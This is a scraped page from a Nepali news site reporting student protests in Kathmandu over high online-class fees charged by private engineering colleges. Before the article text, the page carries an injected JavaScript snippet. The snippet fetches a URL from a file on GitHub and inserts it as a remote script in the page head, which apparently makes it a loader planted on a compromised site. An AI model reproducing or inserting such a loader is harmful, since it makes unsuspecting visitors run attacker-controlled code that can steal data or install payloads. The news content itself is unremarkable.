;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); निजी इन्जिनियरिङ कलेजले चर्को शुल्क लिएकोमा विद्यार्थीहरुको बिरोध प्रदर्शन – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • निजी इन्जिनियरिङ कलेजले चर्को शुल्क लिएकोमा विद्यार्थीहरुको बिरोध प्रदर्शन
Breaking News

निजी इन्जिनियरिङ कलेजले चर्को शुल्क लिएकोमा विद्यार्थीहरुको बिरोध प्रदर्शन

जुनेली न्यूज, काठमाण्डौ | निजी इन्जिनियरिङ कलेजले अनलाइन कक्षाको चर्को शुल्क लिएको विरोधमा विद्यार्थीहरुले प्रदर्शन गरेका छन् ।

उनीहरुले अनलाइन कक्षाको नाममा २ भिडियो देखाएर डेढ लाख रुपैयाँ लिएकोआरोप्   लगाएका छन् । इन्जिनियरिङ अध्ययन संस्थान (आईओई) ले चर्को शुल्क लिने निजी इन्जिनियरिङ कलेजलाई कारबाही गर्नुपर्ने विद्यार्थीहरुले माग गरेका छन् ।

एशोसिएसन अफ इन्जिनियरिङ कलेज नेपालले बुधबार विज्ञप्ति जारी गरी विद्यार्थीहरुलाई अनलाइन कक्षाको शुल्कमा १० प्रतिशत भन्दा बढी छुट दिन नसक्ने उल्लेख गरेका छन् । विद्यार्थीहरुले निजी कलेज सञ्चालकको भनाइप्रति आपत्ति जनाउँदै यस विषयमा इन्जिनियरिङ अध्ययन संस्थान बोल्नुपर्ने विद्यार्थीको माग छ ।

फेसबुक प्रतिक्रियाहरु